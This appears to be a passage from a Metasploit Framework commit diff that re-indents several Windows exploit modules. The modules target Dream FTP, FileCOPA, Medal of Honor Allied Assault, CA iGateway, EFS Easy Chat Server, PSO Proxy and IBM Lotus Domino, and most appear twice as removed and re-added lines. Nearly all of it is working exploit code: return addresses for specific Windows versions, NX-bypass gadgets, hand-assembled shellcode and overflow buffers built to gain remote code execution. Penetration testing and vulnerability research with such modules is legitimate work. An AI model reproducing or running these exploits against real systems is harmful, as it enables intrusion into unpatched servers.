'DisclosureDate' => 'Mar 03 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(21),
], self.class)
end
def check
connect
banner = sock.get(-1,3)
disconnect
if (banner =~ /Dream FTP Server/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sleep(0.25)
sploit = "\xeb\x29"
sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
sploit << "@@@@@@@@" + payload.encoded
sock.put(sploit + "\r\n")
sleep(0.25)
handler
disconnect
end
end

108
modules/exploits/windows/ftp/filecopa_list_overflow.rb
View File

@ -1,59 +1,59 @@
require 'msf/core'
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'FileCopa FTP Server pre 18 Jul Version',
'Description' => %q{
This module exploits the buffer overflow found in the LIST command
in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
},
'Author' => [ 'Jacopo Cervini' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
def initialize(info = {})
super(update_info(info,
'Name' => 'FileCopa FTP Server pre 18 Jul Version',
'Description' => %q{
This module exploits the buffer overflow found in the LIST command
in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
},
'Author' => [ 'Jacopo Cervini' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-3726' ],
[ 'OSVDB', '27389' ],
[ 'BID', '19065' ],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2k Server SP4 English', { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
[ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77f62740, 'Nops' => 240 } ] # jmp esp
],
'DisclosureDate' => 'Jul 19 2006',
'DefaultTarget' => 0))
end
def exploit
connect_login
print_status("Trying target #{target.name}...")
sploit = "A "
sploit << make_nops(target['Nops'])
sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded
send_cmd( ['LIST', sploit] , false)
handler
disconnect
end
[ 'OSVDB', '27389' ],
[ 'BID', '19065' ],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2k Server SP4 English', { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
[ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77f62740, 'Nops' => 240 } ] # jmp esp
],
'DisclosureDate' => 'Jul 19 2006',
'DefaultTarget' => 0))
end
def exploit
connect_login
print_status("Trying target #{target.name}...")
sploit = "A "
sploit << make_nops(target['Nops'])
sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded
send_cmd( ['LIST', sploit] , false)
handler
disconnect
end
end

192
modules/exploits/windows/games/mohaa_getinfo.rb
View File

@ -1,97 +1,97 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Medal Of Honor Allied Assault getinfo Stack Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the getinfo
command of Medal Of Honor Allied Assault.
},
'Author' => [ 'Jacopo Cervini' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
[ 'URL', 'http://www.milw0rm.com/exploits/357'],
[ 'BID', '10743'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
],
'DisclosureDate' => 'Jul 17 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12203)
], self.class)
end
def exploit
connect_udp
# We should convert this to metasm - Patrick
buf = 'B' * target['Rets'][0]
buf << "\x68\x76\x76\x76\x76"*9 # PUSH 76767676 x 9
buf << "\x68\x7f\x7f\x7f\x7f" # PUSH 7F7F7F7F
buf << "\x57" # PUSH EDI
buf << "\x58" # POP EAX
buf << "\x32\x64\x24\x24" # XOR AH,BYTE PTR SS:[ESP+24]
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x48"*150 # DEC EAX x 150
buf << "\x50\x50" # PUSH EAX x 2
buf << "\x53" # PUSH EBX
buf << "\x58" # POP EAX
buf << "\x51" # PUSH ECX
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x6a\x7f" # PUSH 7F
buf << "\x5e" # POP ESI
buf << "\x46"*37 # INC ESI
buf << "\x56"*10 # PUSH ESI
buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24]
buf << "\x49\x49" # DEC ECX
buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX
buf << "\x58"*11 # POP EAX
buf << "\x42"*66
buf << "\x3c"*4
buf << "\x42"*48
buf << [ target['Rets'][1] ].pack('V')
req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
req << "\r\n\r\n" + make_nops(32) + payload.encoded
udp_sock.put(req)
handler
disconnect_udp
end
end
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Medal Of Honor Allied Assault getinfo Stack Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the getinfo
command of Medal Of Honor Allied Assault.
},
'Author' => [ 'Jacopo Cervini' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
[ 'URL', 'http://www.milw0rm.com/exploits/357'],
[ 'BID', '10743'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
],
'DisclosureDate' => 'Jul 17 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12203)
], self.class)
end
def exploit
connect_udp
# We should convert this to metasm - Patrick
buf = 'B' * target['Rets'][0]
buf << "\x68\x76\x76\x76\x76"*9 # PUSH 76767676 x 9
buf << "\x68\x7f\x7f\x7f\x7f" # PUSH 7F7F7F7F
buf << "\x57" # PUSH EDI
buf << "\x58" # POP EAX
buf << "\x32\x64\x24\x24" # XOR AH,BYTE PTR SS:[ESP+24]
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x48"*150 # DEC EAX x 150
buf << "\x50\x50" # PUSH EAX x 2
buf << "\x53" # PUSH EBX
buf << "\x58" # POP EAX
buf << "\x51" # PUSH ECX
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x6a\x7f" # PUSH 7F
buf << "\x5e" # POP ESI
buf << "\x46"*37 # INC ESI
buf << "\x56"*10 # PUSH ESI
buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24]
buf << "\x49\x49" # DEC ECX
buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX
buf << "\x58"*11 # POP EAX
buf << "\x42"*66
buf << "\x3c"*4
buf << "\x42"*48
buf << [ target['Rets'][1] ].pack('V')
req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
req << "\r\n\r\n" + make_nops(32) + payload.encoded
udp_sock.put(req)
handler
disconnect_udp
end
end

176
modules/exploits/windows/http/ca_igateway_debug.rb
View File

@ -1,93 +1,93 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Computer Associates
iTechnology iGateway component. When <Debug>True</Debug> is enabled
in igateway.conf (non-default), it is possible to overwrite the stack
and execute code remotely. This module works best with Ordinal payloads.
},
'Author' => 'patrick',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-3190' ],
[ 'OSVDB', '19920' ],
[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
[ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
[ 'BID', '15025' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
'Compat' =>
{
'ConnectionType' => '+ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
],
'Privileged' => true,
'DisclosureDate' => 'Oct 06 2005',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(5250),
], self.class)
end
def check
connect
sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique?
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
seh = generate_seh_payload(target.ret)
buffer = Rex::Text.rand_text_alphanumeric(5000)
buffer[1082, seh.length] = seh
sploit = "GET /" + buffer + " HTTP/1.0"
sock.put(sploit + "\r\n\r\n\r\n")
disconnect
handler
end
def initialize(info = {})
super(update_info(info,
'Name' => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Computer Associates
iTechnology iGateway component. When <Debug>True</Debug> is enabled
in igateway.conf (non-default), it is possible to overwrite the stack
and execute code remotely. This module works best with Ordinal payloads.
},
'Author' => 'patrick',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-3190' ],
[ 'OSVDB', '19920' ],
[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
[ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
[ 'BID', '15025' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
'Compat' =>
{
'ConnectionType' => '+ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
],
'Privileged' => true,
'DisclosureDate' => 'Oct 06 2005',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(5250),
], self.class)
end
def check
connect
sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique?
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
seh = generate_seh_payload(target.ret)
buffer = Rex::Text.rand_text_alphanumeric(5000)
buffer[1082, seh.length] = seh
sploit = "GET /" + buffer + " HTTP/1.0"
sock.put(sploit + "\r\n\r\n\r\n")
disconnect
handler
end
end

178
modules/exploits/windows/http/efs_easychatserver_username.rb
View File

@ -1,90 +1,90 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in EFS Software Easy Chat Server. By
sending a overly long authentication request, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'LSO <lso[@]hushmail.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2466' ],
[ 'OSVDB', '7416' ],
[ 'BID', '25328' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
],
'DisclosureDate' => 'Aug 14 2007',
'DefaultTarget' => 0))
register_options( [ Opt::RPORT(80) ], self.class )
end
def check
res = send_request_raw
if res and res['Server'] =~ /Easy Chat Server\/1.0/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
# randomize some values.
val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1)
# exploit buffer.
filler = rand_text_alpha(216)
seh = generate_seh_payload(target.ret)
juju = filler + seh
uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}"
print_status("Trying target #{target.name}...")
send_request_raw({'uri' => uri}, 5)
handler
disconnect
end
end
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in EFS Software Easy Chat Server. By
sending a overly long authentication request, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'LSO <lso[@]hushmail.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2466' ],
[ 'OSVDB', '7416' ],
[ 'BID', '25328' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
],
'DisclosureDate' => 'Aug 14 2007',
'DefaultTarget' => 0))
register_options( [ Opt::RPORT(80) ], self.class )
end
def check
res = send_request_raw
if res and res['Server'] =~ /Easy Chat Server\/1.0/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
# randomize some values.
val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1)
# exploit buffer.
filler = rand_text_alpha(216)
seh = generate_seh_payload(target.ret)
juju = filler + seh
uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}"
print_status("Trying target #{target.name}...")
send_request_raw({'uri' => uri}, 5)
handler
disconnect
end
end

174
modules/exploits/windows/http/psoproxy91_overflow.rb
View File

@ -1,91 +1,91 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'PSO Proxy v0.91 Stack Overflow',
'Description' => %q{
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
If a client sends an excessively long string the stack is overwritten.
},
'Author' => 'Patrick Webster <patrick@aushack.com>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
[ 'BID', '9706' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 370,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
],
'Privileged' => false,
'DisclosureDate' => 'Feb 20 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
end
def initialize(info = {})
super(update_info(info,
'Name' => 'PSO Proxy v0.91 Stack Overflow',
'Description' => %q{
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
If a client sends an excessively long string the stack is overwritten.
},
'Author' => 'Patrick Webster <patrick@aushack.com>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
[ 'BID', '9706' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 370,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
],
'Privileged' => false,
'DisclosureDate' => 'Feb 20 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
end
end

320
modules/exploits/windows/lotus/domino_http_accept_language.rb
View File

@ -1,161 +1,161 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in IBM Lotus Domino Web Server
prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 114 bytes.
},
'Author' => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2008-2240'],
['OSVDB', '45415'],
['BID', '29310'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x20\x2c\x3b",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dl
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll
'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'JmpESP' => 0x62c6072e, # jmp esp @lsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
],
'DisclosureDate' => 'May 20 2008'))
register_options( [ Opt::RPORT(80) ], self.class )
end
def exploit
connect
lang = rand_text_alphanumeric(116) # greetz to hateful chris
lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi)
lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax)
lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash
lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1
lang << "\x00"
lang << payload.encoded
if(not target['DisableNX'])
lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4
lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2
lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top
else
lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8
lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2
lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3
lang[ 88, 4 ] = [target['Ret']].pack('V') # 4
lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6
lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top
lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5
end
uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger
print_status("Trying target #{target.name}...")
send_request_raw({
'uri' => "#{uri}",
'method' => 'GET',
'headers' =>
{
'Accept' => '*/*',
'Accept-Language' => "#{lang}",
'Accept-Encoding' => 'gzip,deflate',
'Keep-Alive' => '300',
'Connection' => 'keep-alive',
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
}
}, 5)
handler
disconnect
end
end
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in IBM Lotus Domino Web Server
prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 114 bytes.
},
'Author' => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2008-2240'],
['OSVDB', '45415'],
['BID', '29310'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x20\x2c\x3b",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dl
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll
'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll
'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
'JmpESP' => 0x62c6072e, # jmp esp @lsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll
